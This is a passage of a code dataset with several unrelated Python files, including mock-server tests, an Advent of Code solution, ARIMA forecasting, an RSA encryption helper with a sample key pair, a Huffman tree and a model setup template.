max","repo_name":"piratzii-tm/algorithms_solutions","sub_path":"leetcode/Max_area_of_island.py","file_name":"Max_area_of_island.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"139082889","text":"import pytest\nimport requests\nfrom hamcrest import assert_that, calling, raises, contains_string\nfrom hamcrest.core.base_matcher import BaseMatcher\nfrom library.python.testing.pyremock.lib.pyremock import MatchRequest, MockResponse, assert_expectations\nfrom base_test import BaseTest\n\n\nclass TestAssertExpectations(BaseTest):\n class _RaisingMatcher(BaseMatcher):\n def _matches(self, item):\n raise Exception(\"Match failed\")\n\n def describe_to(self, description):\n return \"\"\n\n def test_exception_in_route_matcher(self):\n request = MatchRequest(method=self._RaisingMatcher())\n mock_response = MockResponse(status=200, body=\"\")\n self.mock_server.expect(request, mock_response)\n\n url = self._make_url(self.mock_port, \"\")\n response = requests.get(url, timeout=1)\n assert response.status_code == requests.codes.not_found\n assert_that(calling(self.mock_server.assert_expectations), raises(AssertionError))\n\n def test_exception_in_request_matcher(self):\n request = MatchRequest(body=self._RaisingMatcher())\n mock_response = MockResponse(status=200, body=\"\")\n self.mock_server.expect(request, mock_response)\n\n url = self._make_url(self.mock_port, \"\")\n response = requests.get(url, timeout=1)\n assert response.status_code == requests.codes.bad_request\n assert_that(calling(self.mock_server.assert_expectations), raises(AssertionError))\n\n @assert_expectations\n def _test_assert_expectations_decorator_with_failed_expectations(self):\n request = MatchRequest()\n mock_response = MockResponse(status=200, body=\"\")\n self.mock_server.expect(request, mock_response)\n\n def 
test_assert_expectations_decorator_with_failed_expectations(self):\n assert_that(calling(self._test_assert_expectations_decorator_with_failed_expectations),\n raises(AssertionError))\n\n @assert_expectations\n def test_assert_expectations_decorator_with_successed_expectations(self):\n request = MatchRequest()\n mock_response = MockResponse(status=200, body=\"\")\n self.mock_server.expect(request, mock_response)\n\n url = self._make_url(self.mock_port, \"\")\n response = requests.get(url, timeout=1)\n assert response.status_code == requests.codes.ok\n\n @pytest.mark.parametrize(\"arg\", [0, 1])\n @assert_expectations\n def test_assert_expectations_decorator_with_parametrization(self, arg):\n request = MatchRequest(path=contains_string(str(arg)))\n mock_response = MockResponse(status=200, body=\"\")\n self.mock_server.expect(request, mock_response)\n\n url = self._make_url(self.mock_port, \"/%d\" % arg)\n response = requests.get(url, timeout=1)\n assert response.status_code == requests.codes.ok\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"library/testing/pyremock/tests/test_assert_expectations.py","file_name":"test_assert_expectations.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40399099786","text":"# -*- coding: utf-8 -*-\n\nimport enum\nfrom typing import Optional, Dict\n\nfrom matplotlib import pyplot as plt\nfrom mpl_events.mpl import Figure\n\nfrom .base import InteractorBase\nfrom .zoom import MouseWheelScrollZoomInteractor\nfrom .drag import MouseDragInteractor\nfrom .state import AxesLimitsResetInteractor\n\n\nclass Actions(enum.Flag):\n \"\"\"Interaction action flags\n \"\"\"\n\n ZOOM = enum.auto()\n DRAG = enum.auto()\n RESET = enum.auto()\n\n ALL = ZOOM | DRAG | RESET\n\n\ndef interact(figure: Optional[Figure] = None,\n actions: Actions = Actions.ALL) -> Dict[Actions, InteractorBase]:\n \"\"\"Enables interactors for the figure\n\n Supports interaction actions:\n\n * zoom\n * drag\n * reset axes\n \"\"\"\n if not figure:\n figure = plt.gcf()\n\n if not hasattr(interact, 'interactors'):\n interact.interactors = {}\n\n if figure in interact.interactors:\n for interactor in interact.interactors[figure].values():\n interactor.mpl_disconnect()\n del interact.interactors[figure]\n\n interactors = interact.interactors.setdefault(figure, {})\n\n if Actions.ZOOM in actions:\n interactors[Actions.ZOOM] = MouseWheelScrollZoomInteractor(figure)\n if Actions.DRAG in actions:\n interactors[Actions.DRAG] = MouseDragInteractor(figure)\n if Actions.RESET in actions:\n interactors[Actions.RESET] = AxesLimitsResetInteractor(figure)\n\n return interactors\n","repo_name":"espdev/mpl-interact","sub_path":"mpl_interact/shortcuts.py","file_name":"shortcuts.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"38936847979","text":"'''\nCreated on 30-Sep-2016\n\n@author: harshit\n'''\n\nimport pandas as pd\n\ntrain_data = pd.read_csv('../data/CAX_Train.csv', dtype={'mpn_qs': object})\n\ntrain_data_title = train_data['title'].astype(str)\ntrain_data_desc = train_data['product_description'].astype(str)\ntrain_data_mpn = train_data['mpn_qs'].astype(str)\n\nnumRows = len(train_data)\n\nf = open('../aux_data/train_mismatch_rows_naive.txt','w')\n\nmisMatchCount = 0\n\nfor i in range(numRows):\n title_split = train_data_title[i].split()\n desc_split = train_data_desc[i].split()\n \n 
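# flag whether the exact MPN string occurs as a whitespace-delimited token in the title or the description\n    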
found = False\n \n for tc in title_split:\n if train_data_mpn[i] == tc:\n found = True\n break\n \n if found == False: \n for dc in desc_split:\n if train_data_mpn[i] == dc:\n found = True\n break\n \n if found == False:\n misMatchCount += 1\n f.write( \"\\nrow with id \" + str(i+ 1) + \" couldn't find overlap\")\n\nf.write(\"\\nTotal mismatched: \" + str(misMatchCount) + \" out of \" + str(numRows))\n \n","repo_name":"pandeconscious/crowdanalyticsProductMPN","sub_path":"src/naiveMPNContainmentCheck.py","file_name":"naiveMPNContainmentCheck.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20875475125","text":"# https://adventofcode.com/2022/day/9\n# AoC 2022 - 9_1\n\nimport numpy as np\n\ndef get_input_data(in_file: str):\n with open(in_file, 'r') as f_in:\n return [_line.strip() for _line in f_in.readlines()]\n \n\ndef update_tail(tail_idx: int, head_idx: int):\n # row: head moves right, col: head moves down\n if tail_idx < head_idx:\n return 1\n # row: head moves left, col: head moves up\n if tail_idx > head_idx:\n return -1\n return 0\n\ndef get_save_matrix_size(_lines: list):\n max_rows, max_cols = 1, 1\n sum_up, sum_right = 0, 0\n for line in _lines: \n direction, steps = line.split()\n steps = int(steps)\n if direction == 'U' or direction == 'D': \n max_rows += steps\n sum_up += steps if direction == 'U' else 0\n if direction == 'R' or direction == 'L':\n max_cols += steps\n sum_right += steps if direction == 'R' else 0\n _grid = np.zeros((max_rows, max_cols))\n _start = {'row': sum_up, 'col': sum_right} \n return _grid, {'row': sum_up, 'col': sum_right}, {'row': sum_up, 'col': sum_right}\n\n\n\ninput_data = \"aoc2022_data/aoc2022_9.txt\"\nlines = get_input_data(input_data)\n\n\n# get maximum matrix size: sum all up and down for vertical (= rows) and \n# all right and left values for horizontal (= cols) direction\n# one additional row and col for start position\n\ngrid, t_pos, h_pos = get_save_matrix_size(lines)\ngrid[h_pos['row'], h_pos['col']] = 1\n\nfor line in lines:\n direction, steps = line.split()\n steps = int(steps)\n for step in range(steps):\n \n # move head \n if direction == 'U':\n h_pos['row'] -= 1\n if direction == 'D':\n h_pos['row'] += 1\n if direction == 'L':\n h_pos['col'] -= 1\n if direction == 'R':\n h_pos['col'] += 1\n \n # update tail \n # critical diagnoal distance \n if abs(t_pos['row'] - h_pos['row']) + abs(t_pos['col'] - h_pos['col']) > 2: \n t_pos['row'] += update_tail(t_pos['row'], h_pos['row'])\n t_pos['col'] += update_tail(t_pos['col'], h_pos['col'])\n # critical horizontal distance \n elif abs(t_pos['row'] - h_pos['row']) > 1 and abs(t_pos['col'] - h_pos['col']) <= 1:\n t_pos['row'] += update_tail(t_pos['row'], h_pos['row'])\n # critical vertical distance\n elif abs(t_pos['row'] - h_pos['row']) <= 1 and abs(t_pos['col'] - h_pos['col']) > 1: \n t_pos['col'] += update_tail(t_pos['col'], h_pos['col'])\n \n # mark as visited\n grid[t_pos['row'], t_pos['col']] = 1\n\nt_visited = int(grid.sum())\nprint(f\"{t_visited} positions are visited by the tail of the rope at least once.\") \n","repo_name":"AntonieV/AoC2022","sub_path":"aoc_2022_day_9-1.py","file_name":"aoc_2022_day_9-1.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"162937809","text":"import pytest\n\n\n@pytest.mark.smtp\nasync def test_auth_invalid_method(env):\n client = await 
env.nwsmtp.get_client()\n await client._ehlo_or_helo_if_needed()\n\n auth_cmd = b\"AUTH WEIRDMETHOD\"\n code, msg = await client.execute_command(auth_cmd)\n\n assert code == 535\n assert \"5.7.8 Error: Method is not supported.\" in msg\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/infra/test_auth_invalid_method_smtp.py","file_name":"test_auth_invalid_method_smtp.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11751051708","text":"from typing import Type\nfrom fastapi import UploadFile\nimport magic\nfrom .config import MAX_IMAGE_UPLOAD_SIZE, ALLOWED_MEDIA_TYPES\nfrom .exceptions import BaseAPIException, RequestEntityTooLargeException, \\\n EmptyFileUploadException, UnsupportedMediaTypeException\n\n\ndef get_exception_responses(*exceptions: Type[BaseAPIException]) -> dict:\n responses = dict()\n for exception in exceptions:\n responses.update(exception.response_model())\n return responses\n\n\ndef validate_file_size(file: UploadFile):\n if file.size > MAX_IMAGE_UPLOAD_SIZE:\n raise RequestEntityTooLargeException\n\n\ndef validate_emptiness(files: list[UploadFile]):\n if not len(files):\n raise EmptyFileUploadException\n\n\ndef validate_file_format(file: UploadFile):\n file_type = magic.from_buffer(file.file.read(2048), mime=True)\n if file_type not in ALLOWED_MEDIA_TYPES:\n raise UnsupportedMediaTypeException\n","repo_name":"mrqwer/ml_fastapi_proj","sub_path":"src/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17583872765","text":"import pandas as pd\nfrom statsmodels.tsa.arima_model import ARIMA\nimport numpy as np\nimport csv\n\n\ndef get_distance(predict, expect):\n dist = (predict - expect) ** 2\n return np.sqrt(sum(dist))\n\n\ndef calc_error(pred_list, tar_list):\n diff = [abs(x1 - x2) for (x1, x2) in zip(tar_list, pred_list)]\n val = np.array(np.divide(diff, tar_list, out=np.zeros_like(diff), where=tar_list != 0))\n return 1 - val.mean(0)\n\n\ndef get_train_test_sets(num_history):\n data_set = pd.read_csv('../data/mergedData.csv', index_col=None, header=0)\n data_set['Date'] = pd.to_datetime(data_set.Date, format='%d/%m/%Y')\n cows = data_set.groupby(\"CowID\")\n train = []\n test = []\n\n for cow in cows.groups:\n cow_array = cows.get_group(cow)\n cow_array = cow_array.sort_values(by=['Date'])\n cow_array = cow_array.fillna(cow_array.mean())\n if cow_array.shape[0] < num_history:\n continue\n\n train.append(cow_array.tail(num_history).head(num_history - 1))\n test.append(cow_array.tail(num_history).tail(1))\n\n return train, test, data_set.columns[-15:]\n\n\ndef write_to_file(num_history, mean_error):\n file_name = '../results/arima/' + str(num_history - 1) + '_arima.csv'\n with open(file_name, 'w', newline='') as csv_file:\n res_writer = csv.writer(csv_file)\n for out, error in mean_error:\n res_writer.writerow([str(out), str(error)])\n\n\ndef run_arima(num_history):\n train, test, outputs = get_train_test_sets(num_history)\n mean_error = []\n\n for out in outputs:\n prediction = []\n test_out = []\n j = 0\n for tr in range(len(train)): # len(train)\n try:\n train_out = train[tr][out]\n model = ARIMA(train_out, order=(5, 1, 0))\n model_fit = model.fit(disp=0)\n predict = model_fit.forecast()\n prediction.append(predict[0].min())\n test_out.append(test[tr][out].values)\n\n except:\n j += 1\n 
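# ARIMA fitting or forecasting failed for this cow's series; count it and skip\n                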
continue\n\n        error = calc_error(prediction, test_out)\n\n        mean_error.append((out, error))\n        print(str(out) + \": \", error)\n\n    write_to_file(num_history, mean_error)\n\n\nif __name__ == \"__main__\":\n    for i in range(10, 31):\n        run_arima(i)\n","repo_name":"mirashama/Afimilk---Cow-s-Yield-Prediction","sub_path":"models/Arima.py","file_name":"Arima.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"74391013674","text":"class node:\n    def __init__(self, coeff, pwr):\n        self.coeff = coeff\n        self.next = None\n        self.power = pwr\n\n\n# Linked List Class\nclass LinkedList:\n    def __init__(self):\n        self.head = None\n\n    def insert(self, coeff, pwr):\n        if self.head is None:\n            self.head = node(coeff, pwr)\n        else:\n            new_node = node(coeff, pwr)\n            temp = self.head\n            while temp.next:\n                temp = temp.next\n            temp.next = new_node\n\n\ndef create_list(arr, n):\n    lis = LinkedList()\n    k = 0\n    for i in range(n):\n        lis.insert(arr[k], arr[k + 1])\n        k += 2\n    return lis.head\n\n\ndef add_polynomial(poly1, poly2):\n    string = ''\n    arr = [0] * 1000\n    while poly1 is not None:\n        arr[poly1.power - 1] += poly1.coeff\n        poly1 = poly1.next\n    while poly2 is not None:\n        arr[poly2.power - 1] += poly2.coeff\n        poly2 = poly2.next\n    for i in range(len(arr) - 1, -1, -1):\n        if arr[i] != 0:\n            string += \"{0}x^{1} + \".format(arr[i], i + 1)\n    print(string.strip()[:-2])\n\n\nif __name__ == '__main__':\n    t = int(input())\n    for i in range(t):\n        n = int(input())\n        arr = list(map(int, input().strip().split()))\n        poly1 = create_list(arr, n)\n        n = int(input())\n        arr = list(map(int, input().strip().split()))\n        poly2 = create_list(arr, n)\n        add_polynomial(poly1, poly2)","repo_name":"Binovizer/GeeksForGeeks-Python","sub_path":"arrays/add_polynomial.py","file_name":"add_polynomial.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"14506423998","text":"from pathlib import Path\nfrom typing import Optional\n\nimport click\nfrom pydantic import BaseSettings, validator\n\n\nALLOWED_FORMAT_VARIABLES = (\n    \"media_type\",\n    \"media_format\",\n    \"file\",\n    \"file_extension\",\n    \"file_name\",\n    \"relative_path\",\n)\n\n\nclass GlobalSettings(BaseSettings):\n    format_pattern: Optional[str] = None\n    unknown_format_pattern: Optional[str] = None\n    storage_location: Path = Path.home().joinpath(\".catalogues/\")\n\n    class Config:\n        env_prefix = \"CATALOGUER_\"\n\n    @validator(\"format_pattern\", \"unknown_format_pattern\", allow_reuse=True)\n    def validate_format_pattern(cls, format_pattern: str):\n        if format_pattern:\n            try:\n                format_pattern.format(\n                    **{field: \"\" for field in ALLOWED_FORMAT_VARIABLES}\n                )\n            except KeyError as exception:\n                raise click.BadParameter(\n                    f'Unrecognised \"{exception.args[0]}\" format variable. 
Please check your format pattern.'\n                )\n        return format_pattern\n\n    @validator(\"storage_location\")\n    def storage_location_must_exists(cls, storage_location: Path):\n        if storage_location:\n            storage_location = storage_location.resolve()\n            if storage_location.exists() and not storage_location.is_dir():\n                raise ValueError(f\"{storage_location} is not a directory\")\n            storage_location.mkdir(parents=True, exist_ok=True)\n        return storage_location\n","repo_name":"iago1460/cataloguer","sub_path":"cataloguer/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"}
+{"seq_id":"8872028095","text":"# 1. Create a dictionary\r\ncities = {\r\n    'Korea' : 'Seoul',\r\n    'Japan' : 'Tokyo',\r\n    'China' : 'Beijing',\r\n    'USA' : 'Washington',\r\n    'France' : 'PARIS'\r\n}\r\n# 2. Access data in the dictionary\r\n\r\nprint(cities)\r\nprint(cities['Korea'])\r\nprint(cities.get('Japan'))\r\ncities['France'] = 'Paris'\r\nprint(cities['France'])\r\ncities['Germany'] = 'Berlin'\r\nprint(cities)\r\nfor country in cities:\r\n    print(country)\r\n\r\n#6 Iterate over the dictionary's values\r\nfor country in cities.values():\r\n    print(country)\r\n\r\n#7 Iterate over both the keys and the values\r\nfor country, city in cities.items():\r\n    print('country: {}, city: {}'.format(country, city))","repo_name":"slihump/study","sub_path":"python/dictionaries_ex.py","file_name":"dictionaries_ex.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"73074244392","text":"# -*- coding: utf-8 -*-\n# Dependency: pip install pycryptodome\n# If the module still cannot be found, try renaming the site-packages subfolder crypto to Crypto under your Python install directory\n\nimport Crypto.Cipher as Cipher\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Cipher import PKCS1_v1_5 as PKCS1_v1_5_cipper\nfrom Crypto.Signature import PKCS1_v1_5 as PKCS1_v1_5_sign\nfrom Crypto.Hash import SHA1\nimport base64\n\nclass RsaHelper(object):\n    \"\"\"RSA encryption, decryption and signing helper\n    \"\"\"\n\n    def __init__(self, ciper_lib=PKCS1_v1_5_cipper, sign_lib=PKCS1_v1_5_sign, hash_lib=SHA1,\n                 pub_file=None, pri_file=None, pub_skey=None, pri_skey=None, pub_key=None, pri_key=None,\n                 reversed_size=11):\n\n        # cipher/signature/hash libraries\n        self.ciper_lib = ciper_lib\n        self.sign_lib = sign_lib\n        self.hash_lib = hash_lib\n\n        # public and private keys\n        if pub_key:\n            self.pub_key = pub_key\n        elif pub_skey:\n            self.pub_key = RSA.importKey(pub_skey)\n        elif pub_file:\n            self.pub_key = RSA.importKey(open(pub_file).read())\n\n        if pri_key:\n            self.pri_key = pri_key\n        elif pri_skey:\n            self.pri_key = RSA.importKey(pri_skey)\n        elif pri_file:\n            self.pri_key = RSA.importKey(open(pri_file).read())\n\n        # reserved length per encryption block\n        self.block_reversed_size = reversed_size\n\n    # compute the block size from the key length\n    def get_block_size(self, rsa_key):\n        try:\n            # RSA can only encrypt/decrypt a limited amount of data at once, so the data must be split into blocks\n            # block size\n            reserve_size = self.block_reversed_size\n            key_size = rsa_key.size_in_bits()\n            if (key_size % 8) != 0:\n                raise RuntimeError('Invalid RSA key length')\n\n            # a private key is used for decryption, which needs no reserved length\n            if rsa_key.has_private():\n                reserve_size = 0\n\n            bs = int(key_size / 8) - reserve_size\n        except Exception as err:\n            print('Failed to compute the cipher block size', rsa_key, err)\n        return bs\n\n    # yield the data in blocks\n    def block_data(self, data, rsa_key):\n        bs = self.get_block_size(rsa_key)\n        for i in range(0, len(data), bs):\n            yield data[i:i + bs]\n\n    # encrypt\n    def enc_bytes(self, data, key=None):\n        text = b''\n        try:\n            rsa_key = self.pub_key\n            if key:\n                rsa_key = key\n\n            cipher = self.ciper_lib.new(rsa_key)\n            for dat in self.block_data(data, rsa_key):\n                cur_text = cipher.encrypt(dat)\n                text += cur_text\n        except Exception as err:\n            print('RSA encryption failed', data, err)\n        return text\n\n    # decrypt\n    def dec_bytes(self, data, key=None):\n        text = b''\n        try:\n            rsa_key = self.pri_key\n            if key:\n                rsa_key = key\n\n            cipher = self.ciper_lib.new(rsa_key)\n            for dat in self.block_data(data, rsa_key):\n                # PKCS1_v1_5 decryption takes a sentinel that is returned on failure; other ciphers (e.g. OAEP) do not\n                if self.ciper_lib is Cipher.PKCS1_v1_5:\n                    cur_text = cipher.decrypt(dat, 'decryption error')\n                else:\n                    cur_text = cipher.decrypt(dat)\n                text += cur_text\n        except Exception as err:\n            print('RSA decryption failed', data, err)\n        return text\n\n    # RSA signing\n    def sign_bytes(self, data, key=None):\n        signature = ''\n        try:\n            rsa_key = self.pri_key\n            if key:\n                rsa_key = key\n\n            h = self.hash_lib.new(data)\n            signature = self.sign_lib.new(rsa_key).sign(h)\n        except Exception as err:\n            print('RSA signing failed', '', err)\n        return signature\n\n    # RSA signature verification\n    def sign_verify(self, data, sig, key=None):\n        try:\n            rsa_key = self.pub_key\n            if key:\n                rsa_key = key\n            h = self.hash_lib.new(data)\n            self.sign_lib.new(rsa_key).verify(h, sig)\n            ret = True\n        except (ValueError, TypeError):\n            ret = False\n        return ret\n\n    # load a standard RSA public/private key PEM file\n    def load_rsa_file(self,fn):\n        key = None\n        try:\n            key = RSA.importKey(open(fn).read())\n        except Exception as err:\n            print('Failed to import the RSA key file', fn, err)\n        return key\n\n\n    # convert a plain key string into an RSA key object\n    def rsa_key_str2std(self,skey):\n        ret = None\n        try:\n            ret = RSA.importKey(skey)\n        except Exception as err:\n            print('Failed to convert the key string into an RSA key', skey, err)\n        return ret\n\nif __name__ == '__main__':\n    pub_key = '''-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC7PyjMEuniN6BPn8oqzIZ6AO1N\njSTO9R3adCCIwKfKIEoWXXM+tHDpktdPKSaAsWJPTNAGvEvtxOfzXib/EMXKqD0e\nUy5MatfpRjRdf1hJVimmfrb09Qx2j7CsKLy7nD23m4xubdYBwvkjMwt/L3JxB5D6\nqryW1wei/j1c+/OCxQIDAQAB\n-----END PUBLIC KEY-----'''\n    pri_key = '''-----BEGIN RSA PRIVATE KEY-----\nMIICXQIBAAKBgQC7PyjMEuniN6BPn8oqzIZ6AO1NjSTO9R3adCCIwKfKIEoWXXM+\ntHDpktdPKSaAsWJPTNAGvEvtxOfzXib/EMXKqD0eUy5MatfpRjRdf1hJVimmfrb0\n9Qx2j7CsKLy7nD23m4xubdYBwvkjMwt/L3JxB5D6qryW1wei/j1c+/OCxQIDAQAB\nAoGAT7vGYJgRNf4f6qgNS4pKHTu10RcwPFyOOM7IZ9M5380+HyXuBB6MEjowKwpH\n1fcy+LepwaR+5KG7b5uBGY4H2ticMtdysBd9gLwnY4Eh4j7LCWE54HvELpeWXkWp\nFQdb/NQhcqMAGwYsTnRPdBqkrUmJBTYqEGkIlqCQ5vUJOCECQQDhe0KGmbq1RWp6\nTDvgpA2dUmlt2fdP8oNW8O7MvbDaQRduoZnVRTPYCDKfzFqpNXL1hAYgth1N0vzD\nnv3VoLcpAkEA1JcY+rLv5js1g5Luv8LaI5/3uOg0CW7fmh/LfGuz8k/OxASN+cAO\nUjPHrxtc5xn1zat4/bnV5GEdlOp/DhquPQJBAIV2Fsdi4M+AueiPjPWHRQO0jvDV\njfwFOFZSn5YSRUa6NmtmPY6tumUJXSWWqKb1GwlVTuc3xBqXYsNLLUWwLhkCQQDJ\nUJCiD0LohhdGEqUuSKnj5H9kxddJO4pZXFSI7UEJbJQDwcBkyn+FTm2BH+tZGZdQ\nfVnlA89OJr0poOpSg+eNAkAKY85SR9KASaTiDBoPpJ8N805XEhd0Kq+ghzSThxL3\nfVtKUQLiCh7Yd8oMd/G5S3xWJHUXSioATT8uPRH2bOb/\n-----END RSA PRIVATE KEY-----'''\n\n    #r = RsaHelper(pri_file='private_key.pem', pub_file='public_key.pem')\n    r = RsaHelper(pub_skey=pub_key,pri_skey=pri_key)\n    data = \"hello word 中国\"\n    encrydata = r.enc_bytes(data.encode(encoding='utf-8'))\n    encrydata = base64.b64encode(encrydata)\n    print(encrydata)\n    encrydata = 'uDeQATxRbbkjTBVHXa6yi8B0KOIu7HLZuvKpXz5KNYQ8RRUTE5P3MF9d4hOG3qq+zk5z8y/1EngzFvpbsljP5qc71YQZbJEUAXARBAWB9ex7GyVlLzIA/T5bF7OmcoCr4fkWt4OYzC0aaFsKsmGDXS6aWGjD6ObulIjizDZiv8k='\n    encrydata = base64.b64decode(encrydata)\n    encrydata = r.dec_bytes(encrydata)\n    print(encrydata.decode(\"utf-8\"))","repo_name":"lhtzbj12/python_encryption","sub_path":"RsaHelper.py","file_name":"RsaHelper.py","file_ext":"py","file_size_in_byte":6428,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"}
+{"seq_id":"246368158","text":"# Represents a Huffman tree for use in encoding/decoding 
strings.\n# A sample usage is as follows:\n#\n# h = HuffmanTree([('A', 2), ('B', 7), ('C', 1)])\n# assert(h.encode('ABC') == '01100')\n# assert(h.decode(h.encode('ABC')) == 'ABC')\nimport heapq\nfrom collections import defaultdict\nclass TreeNode:\n\n    def __init__(self):\n        self.left = None\n        self.right = None\n        self.symbol = None\n        self.weight = 0\n        self.min_element = None\n\n    # make TreeNode objects orderable by (weight, min_element) so heapq can compare them;\n    # min_element breaks ties such as (A:2)(B:1)(C:1), so A can be allocated to the left.\n    def __lt__(self, other):\n        return (self.weight, self.min_element) < (other.weight, other.min_element)\n\nclass HuffmanTree:\n    # Helper object for building the Huffman tree.\n    # You may modify this constructor but the grading script relies on the left, right, and symbol fields.\n\n    # The `symbol_list` argument should be a list of tuples `(symbol, weight)`,\n    # where `symbol` is a symbol that can be encoded, and `weight` is\n    # the unnormalized probability of that symbol appearing.\n\n    def __init__(self, symbol_list):\n        assert(len(symbol_list) >= 2)\n        self.tree = []\n        self.dic = defaultdict()\n        self.symbol_list = symbol_list\n        self.buildTree(symbol_list)\n        self.root = self.tree[0]\n\n    def buildTree(self, symbol_list):\n        for i in symbol_list:\n            node = TreeNode()\n            node.weight = i[1]\n            node.symbol = i[0]\n            node.min_element = node.symbol\n            heapq.heappush(self.tree, node)\n\n        while len(self.tree) > 1:\n            node1 = heapq.heappop(self.tree)\n            node2 = heapq.heappop(self.tree)\n\n            new_node = TreeNode()\n            new_node.min_element = min(node1.min_element, node2.min_element)\n\n            new_node.left = node1\n            new_node.right = node2\n            new_node.weight = node1.weight + node2.weight\n            heapq.heappush(self.tree, new_node)\n\n    # Encodes a string of characters into a string of bits using the\n    # symbol/weight list provided.\n    def encodeHelper(self, root, char):\n        if not root:\n            return\n        elif root.symbol:\n            self.dic[root.symbol] = char\n\n        self.encodeHelper(root.left, char + \"0\")\n        self.encodeHelper(root.right, char + \"1\")\n\n    def encode(self, s):\n        assert(s is not None)\n        res = \"\"\n        root = self.root\n        self.encodeHelper(root, \"\")\n        for char in s:\n            res += self.dic[char]\n\n        return str(res)\n\n    # Decodes a string of bits into a string of characters using the\n    # symbol/weight list provided.\n    def decode(self, s):\n        assert(s is not None)\n        ans = \"\"\n\n        root = self.root\n        if not s:\n            return \"\"\n\n        a = root\n        for bit in s:\n            if bit == \"0\":\n                root = root.left\n            else:\n                root = root.right\n\n            if not root.left and not root.right:\n                ans += root.symbol\n                root = a\n\n        if s != self.encode(ans):\n            return None\n\n        return ans\n","repo_name":"acneyouth2/Algo-and-data-strucutre","sub_path":"HW3/huffman.py","file_name":"huffman.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"30792405010","text":"\"\"\"\nSetup template is intended to help new users quickly start the project.\nWe abstract more and more details in the template UP the level, so that, hopefully,\nat the user implementation level (highest level), users don't need to care too much about the details\n\nCONVENTION. 
We will make use of the following names to name template files from lower to higher levels:\nsetup_template.py (lowest level template) \nsetup_interface1.py\nsetup_interface2.py\nsetup_interface3.py\n...\nsetup.py (highest level, to be defined by users)\n\nRemark: \n1. we shouldn't have too many setup_interfaces. Otherwise, our code design is probably bad.\n2. Ideally, higher level templates use templates from lower levels. \n\"\"\"\n\nfrom .utils import *\nfrom .data import kFoldPrep, kSplitDataset, StandardPrep, StandardDataset\nfrom torch.utils.data import Dataset\n\ndef init_new_template_model(**config):\n model = config['model']\n if model == 'MLP':\n from .model import MLP\n # For NAIVE NUMERICAL DATAFRAME (see data.py, Data Frame Types)\n return MLP(config['layers'])\n \n elif model == 'ResNet1D':\n from .model import eResNet, make_intermediate_layer_settings_eResNet\n # For NAIVE NUMERICAL DATAFRAME (see data.py, Data Frame Types)\n\n cf = config['resnet_conf']\n planes = cf['planes']\n n_blocks = cf['n_blocks']\n s = make_intermediate_layer_settings_eResNet(\n planes=planes, n_blocks=n_blocks, strides=[1,2], \n ) # see projects/resnets.py for more comments \n\n L = config['layers']\n return eResNet(1, L[-1], s, dim=1,input_type='single_flat_channel')\n\n elif model == 'Transformer':\n tfc = config['tf_conf']\n nhead, n_enc, dim_ff = tfc['nhead'], tfc['n_enc'], tfc['dim_ff']\n L = config['layers']\n\n from .model import eTFClassifier\n # For NAIVE NUMERICAL DATAFRAME (see data.py, Data Frame Types)\n # Transformer for classifier \n\n INPUT_DIMENSION, OUT_DIMENSION = L[0], L[-1]\n return eTFClassifier(INPUT_DIMENSION, OUT_DIMENSION, nhead=nhead, n_enc=n_enc, dim_ff=dim_ff)\n\n elif model == 'MLPEmb':\n from .model import MLPEmb\n # For TokenAndFloat DATAFRAME (see data.py, Data Frame Types)\n return MLPEmb(config['layers'], config['TOKEN_FEATURES'], config['NUMERICAL_FEATURES'], config['dict_leng'])\n\n elif model == 'ResNetEmb':\n from .model import eResNetEmb1D\n # For TokenAndFloat DATAFRAME (see data.py, Data Frame Types)\n\n conf = config\n L = config['layers']\n return eResNetEmb1D(conf['TOKEN_FEATURES'], conf['NUMERICAL_FEATURES'], conf['dict_leng'], L['iL_settings'], L['emb_setting'], L['C'])\n\n elif model == 'TransformerEmb':\n from .model import eTFClassifierEmb\n # For TokenAndFloat DATAFRAME (see data.py, Data Frame Types) \n conf = config\n tf_conf = config['tf_conf']\n return eTFClassifierEmb(conf['TOKEN_FEATURES'], conf['NUMERICAL_FEATURES'], conf['dict_leng'], conf['layers']['C'], dim_ff=conf['layers']['dim_ff'], nD=tf_conf['nD'], nhead=tf_conf['nhead'], n_enc=tf_conf['n_enc'],) \n\n else:\n print(model)\n raise NotImplementedError('Model not recognized?') \n\n\n#############################################\n# TypeR1\n#############################################\n\"\"\" \nTypeR1: Raw dataframe. Data is from CSV file.\nCSV file can be loaded as pandas dataframe that has \n1. many columns for features and \n2. one column for target (TARGET_LABEL_NAME). No restriction on data type of target.\n\nData is loaded without any preprocessing.\nUsage: for processed data stored CSV files. 
